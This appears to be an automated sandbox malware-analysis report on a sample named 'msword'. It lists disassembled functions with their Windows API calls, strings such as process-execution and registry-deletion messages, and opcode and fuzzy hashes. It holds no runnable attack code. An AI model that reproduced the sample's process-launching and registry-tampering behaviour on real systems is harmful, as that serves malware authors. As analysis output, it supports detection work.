Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00015600,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
